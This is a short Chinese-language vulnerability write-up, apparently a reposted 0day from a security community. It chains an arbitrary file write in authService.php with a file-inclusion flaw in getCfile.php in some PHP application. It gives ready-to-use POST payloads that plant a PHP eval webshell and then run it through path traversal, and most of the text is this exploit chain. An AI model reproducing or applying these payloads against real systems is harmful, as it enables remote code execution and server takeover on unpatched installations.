作者:Dodgers
一、审计步骤:
(一)查找写入文件函数:
自动化审计,在这个/auth_pi/authService.php文件下发现file_put_contents函数可控,跟进该文件。
/auth_pi/authService.php文件的set_authAction方法。在76行的提醒语句也说明了该info文件在user_auth目录下,而且也未对userName进行安全过滤,这里可以任意路径创建文件。
而P方法存在于/mvc/lib/core.function.php的类里面,是用来接收POST传参。
这里注意:包含路径是data下的
利用方式:
1:post请求
2:请求参数a=set_auth
3:参数为userName、auth
payload:
userName=tr1&auth=<?php%20@eval($_POST['w']);?>
(二)查找文件包含函数:
自动化审计,在这个/local/auth/php/getCfile.php文件下发现include 函数可控,跟进该文件。
这个文件通过post方式传参但是并没有对cf参数进行安全过滤
利用方式:
1:post请求
2:必须存在tmp/app_auth/cfile目录或者自己创建
3:参数为cf、&field=1
payload:
cf=…/…/…/data/tr.info&field=1&w=phpinfo();
说明:这里的文件需要刚刚写文件的文件名
该文章来源火线Zone社区:https://zone.huoxian.cn/d/433-0day-2